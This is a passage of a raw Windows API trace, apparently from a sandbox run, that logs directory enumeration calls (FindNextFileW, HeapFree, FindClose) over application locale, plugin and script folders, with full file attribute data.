ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32e1275, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32e1275, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0177.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.173] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e1275, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32e1275, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32e1275, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0177.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.174] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x297ddff, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x297ddff, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x297ddff, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0177.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.174] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0177.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.175] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0177.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0177.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x297ddff, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x297ddff, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x297ddff, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0177.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x297ddff, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x297ddff, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x297ddff, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0177.176] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0177.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x6ba5b0, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nls", cAlternateFileName="")) returned 0 [0177.177] FindClose (in: hFindFile=0x6ba5b0 | out: hFindFile=0x6ba5b0) returned 1 [0177.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.177] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0177.177] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0177.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0177.179] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed49f1d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed49f1d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed49f1d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="generic-rhp-app", cAlternateFileName="GENERI~1")) returned 1 [0177.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.182] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed49f1d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed49f1d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed49f1d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0177.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.200] FindNextFileW (in: hFindFile=0x6ba5b0, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0177.200] FindClose (in: hFindFile=0x6ba5b0 | out: hFindFile=0x6ba5b0) returned 1 [0177.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.200] FindNextFileW (in: hFindFile=0x6ba2b0, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0177.200] FindClose (in: hFindFile=0x6ba2b0 | out: hFindFile=0x6ba2b0) returned 1 [0177.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.200] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0177.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.252] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0177.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.252] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0177.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0177.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0177.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.280] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0177.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.551] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0177.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.675] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0177.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.768] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0177.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.775] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0177.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.775] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.776] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.776] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.776] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.776] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x3ad, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.776] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rhp", cAlternateFileName="")) returned 0 [0177.776] FindClose (in: hFindFile=0x727b88 | out: hFindFile=0x727b88) returned 1 [0177.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.777] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0177.777] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0177.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.777] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0177.777] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0177.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0177.779] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed23cce, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed23cce, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed23cce, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="home", cAlternateFileName="")) returned 1 [0177.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.779] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed23cce, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed23cce, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed49f1d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0177.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.791] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed49f1d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed49f1d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed49f1d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0177.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0177.791] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff9e0af, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeff9e0af, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="my-computer", cAlternateFileName="MY-COM~2")) returned 1 [0177.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0177.791] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x15fa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="rna-main.js", cAlternateFileName="")) returned 1 [0177.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0177.794] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="js", cAlternateFileName="")) returned 0 [0177.794] FindClose (in: hFindFile=0x7275c8 | out: hFindFile=0x7275c8) returned 1 [0177.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0177.794] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x369ad2d, ftCreationTime.dwHighDateTime=0x1d39f5e, 